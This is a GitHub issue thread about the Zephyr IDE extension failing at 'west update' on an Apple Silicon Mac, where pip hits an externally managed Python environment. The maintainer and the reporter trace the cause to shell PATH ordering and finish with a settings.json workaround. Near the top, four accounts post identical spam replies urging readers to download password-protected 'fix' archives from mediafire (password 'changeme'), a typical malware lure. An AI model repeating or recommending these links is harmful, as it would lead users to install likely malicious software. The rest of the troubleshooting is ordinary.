mylonics/zephyr-ide #55: west update fail on Mac M

rokobertcm, 2024-08-26:
I'm using MacOS 14.6.1 and my computer is MacBook Pro with M3 processor.
When I tray to use Zephyr IDE >Initialize Wokspace< work Ok. And when I came to west update, I get following error.

West update fail at:

pip install -r */requirements.txt

This is log from terminal window.

    error: externally-managed-environment

    × This environment is externally managed
     ╰─> To install Python packages system-wide, try brew install
    xyz, where xyz is the package you are trying to
    install.
    
    If you wish to install a Python library that isn't in Homebrew,
    use a virtual environment:
    
    python3 -m venv path/to/venv
    source path/to/venv/bin/activate
    python3 -m pip install xyz
    
    If you wish to install a Python application that isn't in Homebrew,
    it may be easiest to use 'pipx install xyz', which will manage a
    virtual environment for you. You can install pipx with
    
    brew install pipx
    
    You may restore the old behavior of pip by passing
    the '--break-system-packages' flag to pip, or by adding
    'break-system-packages = true' to your pip.conf file. The latter
    will permanently disable this error.
    
    If you disable this error, we STRONGLY recommend that you additionally
    pass the '--user' flag to pip, or set 'user = true' in your pip.conf
    file. Failure to do this can result in a broken Homebrew installation.
    
    Read more about this behavior here: <https://peps.python.org/pep-0668

    note: If you believe this is a mistake, please contact your Python installation or OS distribution provider. You can override this,     at the risk of breaking your Python installation or OS, by passing --break-system-packages.
    hint: See PEP 668 for the detailed specification.

    *  The terminal process "/bin/zsh '-l', '-c', 'pip install -r */requirements.txt'" terminated with exit code: 1.**

Regards,
Robert

youngerwarrior, 2024-08-26:
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

mabhi02, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

uno-zero, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

masooddahmedd, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

rijesha, 2024-08-26:
Hi @rokobertcm 
I don't have access to a computer running MacOS, so I have not supported the os. I could get a fix for this problem, but I would need some help to test modifications to the extension to resolve the issue.

If you have availability to help debug this issue please let me know and we can try a few things.

Off the bat it seems like the python virtual environment is not being enabled before the west update command is being run.

rokobertcm, 2024-08-27:
Hi @rijesha,

Yes, of course I could help.
Just tell me what to do.

Best regards,
Robert Konc

rijesha, 2024-08-28:
This question here basically is going through the same problem. https://stackoverflow.com/questions/78036376/how-to-activate-python-environment-in-zsh-using-vscode-terminal
I'll have a look tomorrow morning to see how to set up the virtual environment if zsh is used.
Do you have bash installed as well?
Somehow setting that as your default for vscode may cause the app to use it by default and the problems may be fixed on there own.

rokobertcm, 2024-08-28:
I have check and "Activate Python environment in all terminals" is enabled in VS Code global settings.

My default shell is zsh(zsh 5.9 (x86_64-apple-darwin23.0)).
But bash(GNU bash, version 3.2.57(1)-release (arm64-apple-darwin23))  is also installed.

rokobertcm, 2024-08-28:
> In your settings.json can you add the following line. Restart VScode and try setting up the workspace again?
>
> "terminal.integrated.defaultProfile.osx": "bash",
>
>
> [W3Schools.com]
>
> To elektronsko sporocilo in vse morebitne priloge so poslovna skrivnost in namenjene izkljucno naslovniku. Ce ste sporocilo prejeli pomotoma, Vas prosimo, da obvestite pošiljatelja, sporocilo pa takoj unicite. Kakršnokoli razkritje, distribucija ali kopiranje vsebine sporocila je izrecno prepovedano. Ni nujno, da to sporocilo odraža uradno stališce družbe.
>
> This e-mail and any attachments may contain confidential and/or privileged information and is intended solely for the addressee. If you are not the intended recipient (or have received this e-mail in error) please notify the sender immediately and destroy this e-mail. Any unauthorized copying, disclosure or distribution of the material in this e-mail is strictly forbidden. This e-mail may not necessarily reflect the official viewpoint of the Compton.
>
> Disclaimer from Controlmatik ABW, Domzale d.o.o.

Hi,

I'm tested with those settings and result was same.

Maybe it is something wrong that »initialize Worskace« use  old Python 3.9.6 which is part of Xcode. I have installed Python 3.12 but is not use by Zephyr IDE.

When I press »Initialize Workspace« button process stop and wait at »Setting up Python Environment (2/5)«
***@***.***

and pop up screen is shown in botton right corner
***@***.***

When I press »Reinitialize« then process goes on and stop with error.

***@***.***

rijesha, 2024-08-28:
Unfortunately the images didn't make it through via email

rokobertcm, 2024-08-28:
Then I will put it on github Issues.

rokobertcm, 2024-08-28:
Hi,

I'm tested with those settings and result was same.

Maybe it is something wrong that »initialize Worskace« use  old Python 3.9.6 which is part of Xcode. I have installed Python 3.12 but is not use by Zephyr IDE.

When I press »Initialize Workspace« button process stop and wait at »Setting up Python Environment (2/5)«
[image]

and pop up screen is shown in botton right corner
[image]

When I press »Reinitialize« then process goes on and stop with error.
[image]

rijesha, 2024-08-28:
Can you open a new zephyr ide terminal in vscode and post the results of:
which python
which python3
Can you also open a new zsh terminal in vscode and post the same results.

rokobertcm, 2024-08-28:
Here are results from Zephyr IDE terminal.

> which python
> /opt/homebrew/bin/python
> which python3
> /usr/bin/python3

And from zsh terminal is same.

And also versions:

> python -V
> Python 3.12.5
> python3 -V
> Python 3.9.6

rijesha, 2024-08-28:
I have pushed a new prerelease update. It is v1.1.3.

Could you try it an let me know if it works for you? You should go through a full workspace setup and see if it installs ok.

rokobertcm, 2024-08-28:
I'm install new version.
Create new folder.
Start "Workspace initialize".

Same problem. Stop at west update. When start installing requirements.

But I noticed that there is no more stop at "Setting up Python Environment (2/5)".

> The terminal process "/bin/zsh '-l', '-c', 'pip install -r */requirements.txt'" failed to launch (exit code: 1).

rijesha, 2024-08-28:
I just released a v1.1.4. Could you please try again with that one.

rokobertcm, 2024-08-28:
Still same problem.
This is log from Output window in VS Code.

> Zephyr IDE will now check if build tools are installed and available in system path.
> Please follow the section Install Dependencies. https://docs.zephyrproject.org/latest/develop/getting_started/index.html#install-dependencies.
> The remaining sections on that page will automatically be handled by the zephyr tools extension
> For Windows you may use Chocolately, for debian you may use apt, and for macOS you may use Homebrew
> git version 2.39.3 (Apple Git-146)
> [SETUP] git installed
> Python 3.9.6
> [SETUP] python installed
> pip 21.2.4 from /Applications/Xcode.app/Contents/Developer/Library/Frameworks/Python3.framework/Versions/3.9/lib/python3.9/site-packages/pip (python 3.9)
> [SETUP] pip installed
> [SETUP] python3 venv installed
> cmake version 3.30.2
> 
> CMake suite maintained and supported by Kitware (kitware.com/cmake).
> [SETUP] cmake installed
> Version: DTC 1.7.1
> [SETUP] dtc installed
> [SETUP] Python Virtual Environment created
> Collecting west
>   Using cached west-1.2.0-py3-none-any.whl (95 kB)
> Collecting packaging
>   Using cached packaging-24.1-py3-none-any.whl (53 kB)
> Collecting colorama
>   Using cached colorama-0.4.6-py2.py3-none-any.whl (25 kB)
> Requirement already satisfied: setuptools in ./.venv/lib/python3.9/site-packages (from west) (58.0.4)
> Collecting PyYAML>=5.1
>   Using cached PyYAML-6.0.2-cp39-cp39-macosx_11_0_arm64.whl (172 kB)
> Collecting pykwalify
>   Using cached pykwalify-1.8.0-py2.py3-none-any.whl (24 kB)
> Collecting ruamel.yaml>=0.16.0
>   Using cached ruamel.yaml-0.18.6-py3-none-any.whl (117 kB)
> Collecting python-dateutil>=2.8.0
>   Using cached python_dateutil-2.9.0.post0-py2.py3-none-any.whl (229 kB)
> Collecting docopt>=0.6.2
>   Using cached docopt-0.6.2-py2.py3-none-any.whl
> Collecting six>=1.5
>   Using cached six-1.16.0-py2.py3-none-any.whl (11 kB)
> Collecting ruamel.yaml.clib>=0.2.7
>   Using cached ruamel.yaml.clib-0.2.8-cp39-cp39-macosx_12_0_arm64.whl (134 kB)
> Installing collected packages: six, ruamel.yaml.clib, ruamel.yaml, python-dateutil, docopt, PyYAML, pykwalify, packaging, colorama, west
> Successfully installed PyYAML-6.0.2 colorama-0.4.6 docopt-0.6.2 packaging-24.1 pykwalify-1.8.0 python-dateutil-2.9.0.post0 ruamel.yaml-0.18.6 ruamel.yaml.clib-0.2.8 six-1.16.0 west-1.2.0
> [SETUP] west installed
> [SETUP] West Python Environment Setup complete!
> [SETUP] Installing zephyr-sdk-0.16.8 toolchain...
> tar -xvf "/Users/robert.konc/.zephyr_ide/downloads/zephyr-sdk-0.16.8_macos-aarch64_minimal.tar.xz" -C "/Users/robert.konc/.zephyr_ide/toolchains"
> zephyr-sdk-0.16.8/setup.sh -t arm-zephyr-eabi
> Zephyr SDK 0.16.8 Setup
> 
> All done.
> tar -xvf "/Users/robert.konc/.zephyr_ide/downloads/toolchain_macos-aarch64_arm-zephyr-eabi.tar.xz" -C "/Users/robert.konc/.zephyr_ide/toolchains/zephyr-sdk-0.16.8"
> [SETUP] Installing zephyr-sdk-0.16.8 complete
> Running cmd: west init -l /Users/robert.konc/Soft/zpIDE1/application 
> Starting Task: Zephyr IDE: West Init
> Running cmd: west update
> Starting Task: Zephyr IDE: West Update
> Running cmd: west update
> Starting Task: Zephyr IDE: West Update
> Running cmd: pip install -r /Users/robert.konc/Soft/zpIDE1/external/zephyr/scripts/requirements.txt
> Starting Task: Zephyr IDE: West Update
>

rijesha, 2024-08-28:
When you run it are all the integrated terminals closed. If terminals are reused it may not work properly?

I have another new version that may fix it.

rokobertcm, 2024-08-28:
Just for information.
If I run command in Zephyr IDE Terminal under venv then it run successfully.

> pip install -r /Users/robert.konc/Soft/zpIDE1/external/zephyr/scripts/requirements.txt

But if I want to compile some project it said that I must run first West Update command from Zephyr IDE extension.
[image]

rokobertcm, 2024-08-28:
> When you run it are all the integrated terminals closed? If terminals are reused it may not work properly.
> 
> I have another new version that may fix it.

Yes I started in new windows and create empty folder.

rijesha, 2024-08-28:
Ok. I have pushed a new update. It has a command to Zephyr IDE: Mark West as Ready. This will allow you to try out the rest of the app to see if there are issues.

rijesha, 2024-08-28:
Before the virtual environment was being made with python3 for linux and macos. I have changed it in 1.1.4 to use python. And python in your system should be v3.12 where as python3 is the older version.

rijesha, 2024-08-28:
Could you try another new folder with the latest version of the app V1.2.0. Setup the folder to use a workspace install, and run Check Build Dependencies, Setup West Environment, and West Init. Then could you zip the entire folder and post it here?

rokobertcm, 2024-08-28:
Now it is working. Great job!!!

1. Click "Check Build Dependencies"
2. Click "Setup West Environment"
3. Click " West Init"
4. Click "West Update"
5. Downloading Zephyr repo and modules successfuly. **But still problem with requirements.**
6. Open Zephyr IDE terminal and set venv if not already set. Then run pip install -r (zephyr install folder)/scripts/requirements.txt
7. Run VSCODE command : Zephyr IDE: Mark West as ready.
8. Now you could add project from template. For example "Blinky". Then add build and select board.
9. Start "Zephyr IDE Build Pristine".
10. Build is successfully finished.

rijesha, 2024-08-28:
It would be nice to figure out why the venv is still not set. Is the Zephyr IDE terminal based on bash or zsh now?

Running these commands should give the type of terminal it is.
echo $0
echo $SHELL

And what are the contents of your settings.json file?

rokobertcm, 2024-08-28:
> Could you try another new folder with the latest version of the app V1.2.0. Setup the folder to use a workspace install, and run Check Build Dependencies, Setup West Environment, and West Init. Then could you zip the entire folder and post it here?

Here is entire folder as you requested.
[Zephyr IDE workspace.zip](https://github.com/user-attachments/files/16789146/Zephyr.IDE.workspace.zip)

rokobertcm, 2024-08-28:
> It would be nice to figure out why the venv is still not set. Is the Zephyr IDE terminal based on bash or zsh now?
> 
> Running these commands should give the type of terminal it is. echo $0 echo $SHELL
> 
> And what are the contents of your settings.json file?

echo $0
/bin/zsh
echo $SHELL
/bin/zsh
source .venv/bin/activate                                                             
echo $SHELL              
/bin/zsh
echo $0                  
/bin/zsh

settings.json file:
[settings.json](https://github.com/user-attachments/files/16789184/settings.json)

rokobertcm, 2024-08-29:
> Could you try setting it up again with the latest prerelease. 1.2.1. Im trying to get it to force the use of bash instead of zsh.

I'm tested and it is the same result.

1. Open empty Workspace.
2. Click "Check Build Dependencies"
3. Click "Setup West Environment"
4. Click " West Init"
5. Click "West Update"

It stop at pip install requirements.
`The terminal process "/bin/zsh '-l', '-c', 'pip install -r *requirements.txt'" failed to launch (exit code: 1).`

If I select Zephyr IDE terminal and set venv.
source .venv/bin/activate
echo $SHELL
/bin/zsh
echo $0
/bin/zsh

rijesha, 2024-08-29:
can you send the need settings.json file

rokobertcm, 2024-08-30:
> can you send the new settings.json file

Here is settings.json file from last test.
[settings.json](https://github.com/user-attachments/files/16812413/settings.json)

rijesha, 2024-08-30:
I added a new command in v1.2.2, called Zephyr IDE: Shell Test.
Can you run this command and post the results from the output window.

rokobertcm, 2024-09-01:
Here is windows output after Shell Test.

> macos
> detected macos
> bash
> default set to something else
> Setting terminal to: bash
> bash
> Finished

And if I run West Update, got same problem. But now it is use bash shell. 
Output window:

> Running cmd: west update
> Starting Task: Zephyr IDE: West Update
> Running cmd: pip install -r /Users/robert.konc/Soft/zpIDE5/external/zephyr/scripts/requirements.txt
> Starting Task: Zephyr IDE: West Update

And terminal window:

>  *  The terminal process "/bin/bash '-l', '-c', 'pip install -r */requirements.txt'" failed to launch (exit code: 1).

rijesha, 2024-09-04:
Ok thanks for all your help in this. I think I may try a different solution of adding the virtual environment to the path and see if that fixes the problem.

rokobertcm, 2024-10-10:
I'm debuging Zephyr IDE. And there is my observation.

I'm put shell command "echo $PATH" instead of "pip install *" in westUpdate function.

Here is output form bash terminal.
[image]

And here is same command executed in "Zephyr IDE Terminal".
[image]

As you see that paths sequence is not same. And because of that pip was taken globally.
Maybe you must run tasks in Zephyr IDE terminal instead in bash terminal as it now.

Regards,
Robert

dj-fiorex, 2024-10-19:
Hello guys, i also have a Mac M2 and have a similar problem when setting up workspace. The problem is that Zephyr IDE is trying to use Python 2.7 (found at  /Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python) but i don't know why. i have pyenv installed so i can manage my python versions.

rijesha, 2024-11-02:
@dj-fiorex  @rokobertcm  I am wondering if the issue is due to installing everything with homebrew in bash. The instructions in the zephyr getting started guide are for installing with bash.

Did you run 
(echo; echo 'eval "$(/opt/homebrew/bin/brew shellenv)"') >> ~/.zprofile
source ~/.zprofile

did you add the homebrew python folder to the path,
(echo; echo 'export PATH="'$(brew --prefix)'/opt/python/libexec/bin:$PATH"') >> ~/.zprofile
source ~/.zprofile

You may need to add the homebrew python folder to the path in your .bashrc file and .zshrc file

@andre-stefanov I noticed that you are using zsh in one of the snippets you posted. Are you using mac os and did you have any issues setting up zephyr-ide?

rokobertcm, 2024-11-05:
I'm try to reinstall zephyr requirements as it is written in "zephyr getting started guide" and check ".zprofile file.
Same problem.
But I noticed that .bashrc and .zshrc file was not in my home folder. So I was created them and add homebrew python folder as it describe in previous comment.
Still same problem in West Update:
>pip install -r */requirements.txt'" terminated with exit code: 1.

rokobertcm, 2024-11-05:
I'm playing with bash integrated terminal and found that "westUpdate" works when I remove "-l"(login) switch.
Reason, why "-l" switch make problem is that on macOS when starting shell and adding folders to $PATH from config files is in reverse order that is on Windows and Linux.

It is described [here](https://code.visualstudio.com/docs/terminal/profiles) in bottom of page.

@rijesha could you check if it is necessary to use "-l" switch. If it is then please also check could we use "-l" with "--noprofile" switch.

rokobertcm, 2024-11-07:
For MacOS users I'm temporary solve problem with modifying setting.json file in .vscode folder.
I'm also change default osx terminal profile to "Zephyr IDE Terminal". Does not have influence but it is not need to use bash.
Automation profile is used as shell for automated tasks and debug inside VSCode.
"Icon" key is optional.
Info for @rijesha: As MacOS user it is nessesary to install VSCode "Python Environment Manager" extension. That extension automatically setup Python venv if ".venv folder exist. Maybe it is good to include this extension also in "Zephyr IDE Extension Pack".

```
"terminal.integrated.defaultProfile.osx": "Zephyr IDE Terminal",
"terminal.integrated.automationProfile.osx":{
  "path": "/bin/zsh",
  "icon": "terminal"
},
```

This modification also solve #66 issue.

closed 2024-12-12 by rijesha